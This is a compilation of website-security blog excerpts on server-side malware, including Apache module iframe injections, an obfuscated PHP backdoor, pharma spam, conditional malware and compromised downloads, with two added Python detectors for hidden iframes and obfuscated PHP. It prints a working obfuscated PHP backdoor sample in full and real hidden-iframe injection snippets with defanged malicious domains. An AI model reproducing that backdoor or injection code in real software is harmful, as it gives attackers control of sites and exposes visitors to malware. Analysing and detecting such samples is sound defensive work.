Game of Coins: The Uprise of Bitcoin Mining

Research by Daniel Cid. Authored by Dre Armeda.


One thing you can’t take away from some of the attackers we deal with every day is their creativity. From time to time we write about new trends we’re seeing, and this post is no different. We’ve been seeing a new tactic recently, and it may be affecting your pockets, even if you’re not into the latest trend of using digital currency.

Game of Coins

Digital currency you say?

I sure did! Bitcoin to be exact.


Server Compromises – Understanding Apache Module iFrame Injections and Secure Shell Backdoor

There are many ways to inject a malicious payload onto a website. The attacker can modify any of the web files (index.php, for example), the .htaccess file or php.ini (if the site is using PHP). There are other ways, but those are the most common methods, especially on shared hosts.

However, over the last year we have started to see a new way to inject malware on compromised servers: a malicious Apache module. We posted about it before and it has been covered in many other media. After a few months of tracking these modules, and working on multiple servers that had this issue, we want to share a bit of what we have learned.

Identifying the injection

First, a good way to identify whether an infection is coming via the Apache module compromise is by looking at how the iframe is being inserted. They seem to always follow this pattern:

<style>.t1nhuhjv { position:absolute; left:-1619px; top:-1270px} </style> <div class="t1nhuhjv"><iframe
src="httx://qotive. changeip.name/random/" width="534" height="556"> </iframe></div>

or

<style>.q6umct6stl { position:absolute; left:-1284px; top:-1774px} </style> <div class="q6umct6stl"><iframe
src="httx://nujifa. longmusic.com/kdqjagzxwbakl/cdce48ffcf125f41206a9ed88675b56b/" width="367" height="411"></iframe></div>

The domain name changes very often (the IP is often 62.75.235.48), as do the div class name and the iframe sizes. These are some of the domains we have tracked:

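A small scanner for the pattern described above (a CSS class positioned absolutely with large negative offsets, wrapping a div that contains an iframe). This is an added example, not code from the post; the HTML samples and the attacker.example host are constructed, and the "httx://" defanging is kept so nothing resolves.

```python
import re

# Constructed sample modelled on the injection pattern shown in the post.
SAMPLE_HTML = """<html><body><p>Welcome</p>
<style>.q6umct6stl { position:absolute; left:-1284px; top:-1774px} </style> <div class="q6umct6stl"><iframe
src="httx://attacker.example/random/" width="367" height="411"></iframe></div>
</body></html>"""

# Constructed benign page: the iframe sits in a normally positioned container.
BENIGN_HTML = """<style>.video { position:relative; left:10px; }</style>
<div class="video"><iframe src="https://example.com/embed" width="560" height="315"></iframe></div>"""

# A class rule that contains position:absolute, with its offsets inspected separately.
STYLE_RE = re.compile(
    r"\.([A-Za-z0-9_-]+)\s*\{[^}]*position\s*:\s*absolute[^}]*\}", re.I | re.S)
OFFSET_RE = re.compile(r"(left|top)\s*:\s*(-?\d+)px", re.I)

def offscreen_classes(html, threshold=1000):
    """Return class names positioned absolutely with a large negative left/top offset."""
    hits = set()
    for m in STYLE_RE.finditer(html):
        rule = m.group(0)
        if any(int(v) <= -threshold for _, v in OFFSET_RE.findall(rule)):
            hits.add(m.group(1))
    return hits

def find_hidden_iframes(html):
    """Return (class, iframe src) pairs for iframes wrapped in an off-screen div."""
    findings = []
    for cls in offscreen_classes(html):
        div_re = re.compile(
            r'<div\s+class=["\']' + re.escape(cls) + r'["\']\s*>(.*?)</div>', re.I | re.S)
        for d in div_re.finditer(html):
            for src in re.findall(r'<iframe[^>]*\ssrc=["\']([^"\']+)', d.group(1), re.I | re.S):
                findings.append((cls, src))
    return findings

if __name__ == "__main__":
    print(find_hidden_iframes(SAMPLE_HTML))  # flags the constructed injection
    print(find_hidden_iframes(BENIGN_HTML))  # []
```

Run it over the HTML an ordinary client receives from the server rather than over files on disk, since the module injects at response time and the files themselves stay clean.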

Web Malware – Working with Evil Backdoors – Part III

The most complicated part of our job, when cleaning compromised web sites, is ensuring we find all the backdoors. If we miss one, the site can be reinfected. We have done a few posts about backdoors already, explaining how they work and providing examples of what they are and what they look like:

However, despite it being a very complicated task, most people still think that removing backdoors consists of searching for eval, base64_decode and similar keywords. While that will find some, it’s not highly effective.

Ugly Backdoor

Today, we will present the BACKDOOR:UGLY:13 (yes, that’s how we name it). It is code we are finding on WordPress/Joomla sites compromised with SEO spam, which allows the attackers to reinfect the site and reinject spam code:

<?php
$P81J5DkwYm='CQWnk4mSgxD'^apC4zA_i;$Oq9E1Iip7=ouw&'o}=';$qkit='&='.HZ^'IX=+=-';'nyD'.
'?';$ywO_bGCvD='H]'.pTZYkh.'<G}FC'&hTXXRlZLrO.'[{g';$eBwDr2V=#w50jH83IO7'.
' ,|:F-2>1u@:"'.qgQ1.'<*'^EMR.'"@'.tKU2.'$Ln&)(hkx';$Arb='>8a'^Mb9;'Tpr'.
'rH-AhDxq';$Wt0cI9t='(h9'|'}.}';$ON_=eftg.'/l'|F3FDez;$koJhZ='}'.v.#CF0'.
'.=8l`5'&'RVN]m.l}z^H>';$QgYL=' ".'.DAMT.'%#Q'|' $+(<TH@T-#A';$GDWkPb='@*'.
'%DxM"g#'.HCId.'@^'.ItSA^'xW^sN}@'.OR05.'|Jq./F8|';$g1MRqXRy=$Oq9E1I&/*_Ikm'.
'Uv*/$Wt0cI9t;$Db_3w=$ON_&$qkit;$_izus6=$koJhZ^$QgYL;$gMYmjr=('@)+G)F"N#2$t'.
'$p4"W-,'|'0!&c`v!,0>4$OP0 f#p')^$GDWkPbCn5;$DP7=('5$ C1="E+c.'.g27mr.#DfTy'.
'%!'.r0x66.'<22@5x'|'!4(2rc>`3a?!73 '.cH9a.'$`<34("y+P')&('{jWR%O.%1m^R%-<B'.
'f?W@[#q{];'.ZpqKKG^'J_!'.VG.'[U9%XZ@}'.YJf5.'&LDF$'.MaFIt.'<p');$niZllS=(#'.
'{/7p"'.fjlb.' =i,'^';os0}>?,Qd{(l')|$_bGCvD;if($g1MRqXRy($Db_3w(/*BZKHhHPA'.
'6X$eO*/$gMYmjrlJc))==$DP7)$_izus6(('=[M{]~o~m}'&'~_W9}>'.iyem),$Db_3w(/*y3'.
'n*/$niZ),$eBwDr2V.$ArvQhb.('lv^9{p'^'"C<T6M'));#medAQT)W(Azd-,JG ?f.Er?2R'.
'z-YAYBxK:@x#4St%.q+_H5^P(XB|+leP9f-{1f';


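The UGLY sample above contains no eval or base64_decode, which is why a keyword search misses it; what it does have is string literals combined with the bitwise operators ^, & and |, and function names that are only assembled at run time. The scorer below looks for that structure instead. It is an added example, not the post's tooling; both PHP fragments are constructed (the obfuscated one imitates the sample's style without being it).

```python
import re

# Constructed fragment in the style of the BACKDOOR:UGLY:13 sample: string
# literals combined with ^ & | and called through variable functions,
# with no eval or base64_decode anywhere for a keyword search to hit.
OBFUSCATED = r"""<?php
$a='CQWnk4mSgxD'^'apC4zA_i';$b='ouw'&'o}=';$c='&='.'HZ'^'IX=+=-';
$f=$a.$b;$g=('@)+G)F"N#2$t'|'0!&c`v!,0>4$OP0')^'xW^sN}@';
if($f($c($g))==$a)$f(('=[M{]~o~m}'&'~_W9}>'),$c($g));
"""

# Constructed ordinary PHP: one bitwise operator on integers, no variable calls.
BENIGN = r"""<?php
$flags = 0x04 | 0x02;
echo htmlspecialchars($_GET['q'] ?? '', ENT_QUOTES);
"""

# A string literal, variable or closing paren, a bitwise operator, then another operand.
STRING_BITOP = re.compile(
    r"""(?:'[^']*'|"[^"]*"|\$\w+|\))\s*[\^&|]\s*(?:'[^']*'|"[^"]*"|\$\w+|\()""")
# $name( : a function whose name is computed at run time.
VAR_CALL = re.compile(r"\$\w+\s*\(")
KEYWORDS = re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\b", re.I)

def obfuscation_score(php):
    """Count string/variable bitwise combinations and variable function calls."""
    return len(STRING_BITOP.findall(php)) + 2 * len(VAR_CALL.findall(php))

def classify(php, threshold=6):
    """Flag on keywords OR on structural obfuscation, so UGLY-style code is caught too."""
    if KEYWORDS.search(php):
        return "suspicious (keyword)"
    if obfuscation_score(php) >= threshold:
        return "suspicious (obfuscation)"
    return "clean"

if __name__ == "__main__":
    for name, src in (("obfuscated", OBFUSCATED), ("benign", BENIGN)):
        print(name, obfuscation_score(src), classify(src))
```

The threshold is a starting point: legitimate code rarely chains bitwise operators between string literals more than once or twice, so tune it against your own code base before acting on hits.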

Backdoor Tool Kit – Today’s Scary Web Malware Reality

We often talk about the importance of keeping your server clean. You can see it in a number of our articles and presentations, and this post will likely drive that point home.

This past week we came across a nice little package that we felt compelled to share with you. In it, the attacker makes use of a number of tools designed to help them infiltrate your environment. What’s likely most annoying about this kit is that it’s loaded into your environment, and uses your own resources to help hack you. That’s like being punched in the gut and slapped at the same time, not cool.


Pharma Hack Backdoor Analyzed – PHP5.PHP

Some of you might remember my last Pharma hack post, Intelligent (Pharma) SPAM Decoded. Today I will spend some time looking at a different variant of the same infection type, but focus on a payload that is not encoded or embedded within an existing file; instead it resides in its own file, PHP5.php.

“Hmm, maybe it’s a good / system file, it does have PHP in it, I won’t bother looking at it…”

If you have ever come across this file and found yourself thinking this, we highly encourage you not to, and to take a minute to see if any of its components resemble what we’re about to share.

Dissecting the Payload



GetMama – Conditional malware affecting thousands of sites

We have been tracking an interesting malware that is affecting thousands of compromised sites. We call it GetMama!!

Why conditional? Because instead of just displaying the malicious code to all the visitors of the web site, it connects back to its command and control server to find out what to do. It also sends back to the attackers the IP address, user agent and referrer of the person visiting the compromised site, so the command and control can determine if it should display the malicious content or not.

It also only displays the malicious content once a day per IP address and only to Windows users.


Website Cross-contamination: Blackhat SEO Spam Malware

We recently posted about Website Cross-Contamination which we see quite a bit of in shared hosting environments. This post is a follow up with a nice sample of an SEO Spam infection that uses multiple sites in a shared environment to push their campaign.

We received a clean up request from a customer who was clearly infected with Blackhat SEO Spam:


WordPress Third Party Vulnerability – Deans FCKEditor with PWWANGS Code for WordPress (version 1.0.0)

You have heard me write in the past about understanding the true vulnerability within WordPress. In that post I talk about the benefits of the platform and how those same benefits are also its weakness. This post is an example that brings that point home, specifically about staying diligent with your plugins.

It was recently released that a plugin for WordPress, Deans FCKEditor with PWWANGS Code Plugin for WordPress, was known to contain a very serious vulnerability that gives hackers full control to modify, upload and execute files within your WordPress install (source: PacketStorm). This vulnerability is actually not new and was found in version 1.0.0. That’s not the point, though; what matters is that this version is in fact vulnerable.

Dangerous Backdoor – UTF8GAT.PHP

There is a very prominent backdoor being used extensively across a lot of the sites we are working on these days. This backdoor is giving the attacker[s] full control of your server.

File to be on the look out for:

  • utf8gat.php

Once in your environment, it replicates and embeds itself deep within your file directories, making it difficult to detect. It’s important to remove it completely from your server as soon as possible.

Utf8gat is the most common filename we’re seeing right now; it will most likely evolve with time. If you do not feel comfortable deleting the files, change their permissions to 000 so they can’t be accessed or executed.


MyBB web site and downloads compromised

It’s not good when your site gets infected with malware, especially if you’re a provider of software to many. If you are using MyBB (forum software), please be aware that their web site was hacked and the software download packages compromised:

There was unfortunately a vulnerability in the CMS which powers the MyBB home page and downloads system. Using this vulnerability a hacker was able to add a backdoor to one of the files, allowing them to execute arbitrary PHP and manipulate the release packages. The CMS was custom written a number of years ago, however we believe a 3rd party framework used by the CMS contributed to the vulnerability. The CMS shares no code with MyBB so there should be no concern that these events indicate a vulnerability in MyBB. The server is also configured to isolate the subdomains belonging to the MyBB website, so it is unlikely that any data from the community forums or other sections of the site was compromised.

The MyBB team recommends these actions:

  1. Download the latest release of MyBB.
  2. Replace ./index.php (in the root folder of your forum) with the one in the download (./Upload/index.php).
  3. Remove the ./install/ folder.

*We are trying to find more information about the backdoor that was added, but no luck yet. If you find a link with the affected version, let us know.